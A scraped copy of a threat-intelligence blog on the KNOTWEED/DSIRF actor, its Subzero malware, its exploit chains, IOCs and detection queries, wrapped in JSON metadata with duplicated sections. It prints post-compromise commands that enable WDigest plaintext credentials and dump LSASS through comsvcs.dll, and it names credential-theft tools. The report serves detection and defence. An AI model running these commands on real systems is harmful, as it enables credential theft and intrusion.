Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware \nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool \nacrobatrelay[.]com__| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking _- Detects multiple behaviors, including _JumpLump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module _- Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities\n * _KNOTWEED actor activity detected _- Detects KNOTWEED actor activities\n * _WDigest configuration change _- Detects potential retrieval of clear text password from changes to _UseLogonCredential_ registry key\n * _Sensitive credential memory read _- Detects LSASS credential dumping via minidumps\n * _Suspicious Curl behavior _- Detects the use of Curl to download KNOTWEED tooling from public file shares\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected ****credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to ****plaintext credentials**\n\nThis query looks for registry key being set to enabled plain text credentials\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\ folder_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mmpc", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-07-27T17:46:22", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details Microsoft\u2019s analysis of the observed KNOTWEED activity and related malware used in targeted attacks against our customers. This information is shared with our customers and industry partners to improve detection of these attacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their systems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have also implemented detections against KNOTWEED\u2019s malware and tools.\n\nPSOAs, which [Microsoft also refers to as cyber mercenaries](<https://blogs.microsoft.com/on-the-issues/2022/07/27/private-sector-cyberweapons-psoas-knotweed/>), sell hacking tools or services through a variety of business models. Two common models for this type of actor are access-as-a-service and hack-for-hire. In access-as-a-service, the actor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any targeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who then runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may blend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\n\n## Who is KNOTWEED?\n\nKNOTWEED is an Austria-based PSOA named DSIRF. The [DSIRF website](<https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/>) [web archive link] says they provide services_ \u201cto multinational corporations in the technology, retail, energy and financial sectors_\u201d and that they have \u201c_a set of highly sophisticated techniques in gathering and analyzing information._\u201d They publicly offer several services including \u201c_an enhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities\u201d _and _\u201chighly sophisticated Red Teams to challenge your company&#x27;s most critical assets.\u201d_ \n \nHowever, [multiple](<https://www.intelligenceonline.com/surveillance--interception/2022/04/06/after-finfisher-s-demise-berlin-explores-cyber-tool-options,109766000-art>) [news](<https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html>) [reports](<https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich>) have linked DSIRF to the development and attempted sale of a malware toolset called Subzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in Windows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft\u2019s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama. It\u2019s important to note that the identification of targets in a country doesn\u2019t necessarily mean that a DSIRF customer resides in the same country, as international targeting is common.\n\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF.\n\n## Observed actor activity\n\n### KNOTWEED initial access\n\nMSTIC found KNOTWEED\u2019s Subzero malware deployed in a variety of ways. In the succeeding sections, the different stages of Subzero are referred to by their Microsoft Defender detection names: _Jumplump _for the persistent loader and _Corelump _for the main malware.\n\n#### KNOTWEED exploits in 2022\n\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation exploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF document that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of the exploit chain, but the victim\u2019s Adobe Reader version was released in January 2022, meaning that the exploit used was either a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED\u2019s extensive use of other 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was analyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. Interestingly, there were indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although we\u2019ve seen no evidence of browser-based attacks.\n\nThe CVE-2022-22047 vulnerability is related to an issue with [activation context](<https://docs.microsoft.com/windows/win32/sbscs/activation-contexts>) caching in the Client Server Run-Time Subsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly manifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This cached context is used the next time the process spawned.\n\nCVE-2022-22047 was used in KNOTWEED related attacks for privilege escalation. The vulnerability also provided the ability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit chain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute that specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious activation context was used, the malicious DLL was loaded from the given path, and system-level code execution was achieved.\n\nIt&#x27;s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the threat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker _cannot_ control the path isn\u2019t considered dangerous. Hence, these sandboxes aren\u2019t a barrier to the exploitation of CVE-2022-22047.\n\n#### KNOTWEED exploits in 2021\n\nIn 2021, MSRC received a report of two Windows privilege escalation exploits ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>)) being used in conjunction with an Adobe Reader exploit ([CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>)), all of which were patched in June 2021. MSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\n\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation vulnerability in the Windows Update Medic Service ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)), which allowed an attacker to force the service to load an arbitrary signed DLL. The malicious DLL used in the attacks was signed by \u2018DSIRF GmbH\u2019.\n\nFigure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\n\n#### Malicious Excel documents\n\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file masquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of benign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\n\n Figure 2: Two examples of KNOTWEED Excel macro obfuscation\n\nAfter de-obfuscating strings at runtime, the VBA macro uses the _ExecuteExcel4Macro_ function to call native Win32 functions to load shellcode into memory allocated using _VirtualAlloc_. Each opcode is individually copied into a newly allocated buffer using _memset_ before _CreateThread_ is called to execute the shellcode.\n\nFigure 3: Copying opcodes Figure 4: Calling CreateThread on shellcode\n\nThe following section describes the shellcode executed by the macro.\n\n### KNOTWEED malware and tactics, techniques, and procedures (TTPs)\n\n#### Corelump downloader and loader shellcode\n\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The shellcode&#x27;s purpose is to retrieve the _Corelump_ second-stage malware from the actor\u2019s command-and-control (C2) server. The downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past the _0xFF 0xD9_ marker that signifies the end of a JPEG file). The JPEG is then written to the user\u2019s _%TEMP%_ directory.\n\nFigure 5: One of the images embedded with the loader shellcode and Corelump\n\nThe downloader shellcode searches for a 16-byte marker immediately following the end of JPEG. After finding the marker, the downloader shellcode RC4 decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader shellcode RC4 decrypts the _Corelump_ malware using a second RC4 key and manually loads it into memory.\n\n#### Corelump malware\n\n_Corelump _is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins downloaded from KNOTWEED\u2019s C2 server.\n\nAs part of installation, _Corelump_ makes copies of legitimate Windows DLLs and overwrites sections of them with malicious code. As part of this process, _Corelump_ also modifies the fields in the PE header to accommodate the nefarious changes, such as adding new exported functions, disabling [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), and modifying the image file checksum with a computed value from _CheckSumMappedFile._ These trojanized binaries (_Jumplump_) are dropped to disk in _C:\\Windows\\System32\\spool\\drivers\\color\\_, and COM registry keys are modified for persistence (see the Behaviors section for more information on COM hijacking).\n\n#### Jumplump loader\n\n_Jumplump _is responsible for loading _Corelump _into memory from the JPEG file in the %TEMP% directory. If _Corelump_ is not present, _Jumplump_ attempts to download it again from the C2 server. Both_ Jumplump _and the downloader shellcode are heavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp combination, giving a convoluted control flow throughout the program.\n\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\n\n#### Mex and PassLib\n\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by KNOTWEED and bear capabilities that are derived from publicly available sources. Mex, for example, is a command-line tool containing several red teaming or security plugins copied from GitHub (listed below):\n\n[Chisel](<https://github.com/jpillora/chisel>)| [mimikatz](<https://github.com/ParrotSec/mimikatz>)| [SharpHound3](<https://github.com/BloodHoundAD/SharpHound3>) \n---|---|--- \n[Curl](<https://github.com/curl/curl>)| [Ping Castle](<https://github.com/vletoux/pingcastle>)| [SharpOxidResolver](<https://github.com/S3cur3Th1sSh1t/SharpOxidResolver>) \n[Grouper2](<https://github.com/l0ss/Grouper2>)| [Rubeus](<https://github.com/GhostPack/Rubeus>)| [PharpPrinter](<https://github.com/rvrsh3ll/SharpPrinter>) \n[Internal Monologue](<https://github.com/eladshamir/Internal-Monologue>)| [SCShell](<https://github.com/Mr-Un1k0d3r/SCShell>)| [SpoolSample](<https://github.com/leechristensen/SpoolSample>) \n[Inveigh](<https://github.com/Kevin-Robertson/Inveigh>)| [Seatbelt](<https://github.com/GhostPack/Seatbelt>)| [StandIn](<https://github.com/FuzzySecurity/StandIn>) \n[Lockless](<https://github.com/GhostPack/Lockless>)| [SharpExec](<https://github.com/anthemtotheego/SharpExec>)| \n \nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers, email clients, LSASS, LSA secrets, and the Windows credential manager.\n\n#### Post-compromise actions\n\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\n\n * Setting of _UseLogonCredential _to \u201c1\u201d to enable plaintext credentials:\n * _reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f_\n * Credential dumping via _comsvcs.dll_:\n * _rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump_\n * Attempt to access emails with dumped credentials from a KNOTWEED IP address\n * Using Curl to download KNOTWEED tooling from public file shares such as _vultrobjects[.]com_\n * Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\n\n### KNOTWEED infrastructure connections to DSIRF\n\nPivoting off a known command-and-control domain identified by MSTIC, _acrobatrelay[.]com_, RiskIQ expanded the view of KNOTWEED&#x27;s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network fingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under the control of KNOTWEED. This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving malware since at least February of 2020 and continues through the time of this writing.\n\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious. This process yielded several domains with direct links to DSIRF, including _demo3[.]dsirf[.]eu_ (the company&#x27;s own website), and several subdomains that appear to have been used for malware development, including _debugmex[.]dsirflabs[.]eu_ (likely a server used for debugging malware with the bespoke utility tool Mex) and _szstaging[.]dsirflabs[.]eu_ (likely a server used to stage Subzero malware).\n\n## Detection and prevention\n\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current detections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional advanced hunting queries are also provided below to help organizations extend their protections and investigations of these attacks.\n\n### Behaviors\n\n_Corelump _drops the_ Jumplump_ loader DLLs to _C:\\Windows\\System32\\spool\\drivers\\color\\\\. _This is a common directory used by malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\n\n_Jumplump_ uses COM hijacking for persistence, modifying COM registry keys to point to the _Jumplump_ DLL in _C:\\Windows\\System32\\spool\\drivers\\color\\_. Modifications of default system CLSID values should be monitored to detect this technique (e.g., _HKLM\\SOFTWARE\\Classes\\CLSID\\\\{GUID}\\InProcServer32 Default_ value). The five CLSIDs used by _Jumplump_ are listed below with their original clean values on Windows 11:\n\n * {ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = &quot;_%SystemRoot%\\System32\\ApplicationFrame.dll_&quot;\n * {1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = &quot;_%SystemRoot%\\system32\\propsys.dll_&quot;\n * {4590f811-1d3a-11d0-891f-00aa004b2e24} = &quot;_%SystemRoot%\\system32\\wbem\\wbemprox.dll_&quot;\n * {4de225bf-cf59-4cfc-85f7-68b90f185355} = &quot;_%SystemRoot%\\system32\\wbem\\wmiprvsd.dll_&quot;\n * {F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = &quot;_%SystemRoot%\\System32\\Actioncenter.dll_&quot;\n\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible malicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry keys such as _HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, _and LSASS credential dumping via minidumps.\n\n## Recommended customer actions\n\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the security considerations provided below:\n\n * All customers should prioritize patching of [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>).\n * Confirm that Microsoft Defender Antivirus is updated to security intelligence update **1.371.503.0** or later to detect the related indicators.\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.\n * [Change Excel macro security settings](<https://support.microsoft.com/office/change-macro-security-settings-in-excel-a97c09d2-c082-46b8-b19f-e8621e8fe373>) to control which macros run and under what circumstances when you open a workbook. Customers can also [stop malicious XLM or VBA macros](<https://www.microsoft.com/security/blog/2021/03/03/xlm-amsi-new-runtime-defense-against-excel-4-0-macro-malware/>) by ensuring runtime macro scanning by Antimalware Scan Interface ([AMSI](<https://docs.microsoft.com/windows/win32/amsi/antimalware-scan-interface-portal>)) is on. This feature\u2014enabled by default\u2014is on if the Group Policy setting for Macro Run Time Scan Scope is set to \u201cEnable for All Files\u201d or \u201cEnable for Low Trust Files\u201d.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _Note:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n\n## Indicators of compromise (IOCs)\n\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems. All sample hashes are available in VirusTotal.\n\nIndicator| Type| Description \n---|---|--- \n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629| SHA-256| Malicious Excel document and VBA \n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f| SHA-256| Malicious Excel document and VBA \n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964| SHA-256| Jumplump malware \ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b| SHA-256| Jumplump malware \nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware \n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware \n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware \n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware \n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware \nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware \n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware \n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware \nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware \nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool \ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool \nacrobatrelay[.]com__| Domain| C2 \nfinconsult[.]cc| Domain| C2 \nrealmetaldns[.]com| Domain| C2 \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft Defender Antivirus\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:\n\n * _Backdoor:O97M/JumplumpDropper_\n * _Trojan:Win32/Jumplump_\n * _Trojan:Win32/Corelump_\n * _HackTool:Win32/Mexlib_\n * _Trojan:Win32/Medcerc_\n * _Behavior:Win32/SuspModuleLoad_\n\n### Microsoft Defender for Endpoint\n\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. These alerts are not necessarily an indication of KNOTWEED compromise:\n\n * _COM Hijacking _- Detects multiple behaviors, including _JumpLump_ malware persistence techniques.\n * _Possible privilege escalation using CTF module _- Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities\n * _KNOTWEED actor activity detected _- Detects KNOTWEED actor activities\n * _WDigest configuration change _- Detects potential retrieval of clear text password from changes to _UseLogonCredential_ registry key\n * _Sensitive credential memory read _- Detects LSASS credential dumping via minidumps\n * _Suspicious Curl behavior _- Detects the use of Curl to download KNOTWEED tooling from public file shares\n * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system\n\n## Hunting queries\n\n### Microsoft Sentinel\n\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\_ folder:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>\n\n**Abnormally large JPEG downloaded from new source**\n\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a common source:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>\n\n**Suspected ****credential dumping**\n\nThis query looks for attackers using comsvcs.dll to dump credentials from memory\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>\n\n**Downgrade to ****plaintext credentials**\n\nThis query looks for registry key being set to enabled plain text credentials\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>\n\n### Microsoft 365 Defender advanced hunting\n\nMicrosoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.\n\n**Microsoft Defender Antivirus detections related to KNOTWEED**\n\nThis query identifies detection of related malware and tools by Microsoft Defender Antivirus:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>\n\n**File hash IOCs related to KNOTWEED**\n\nThis query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint 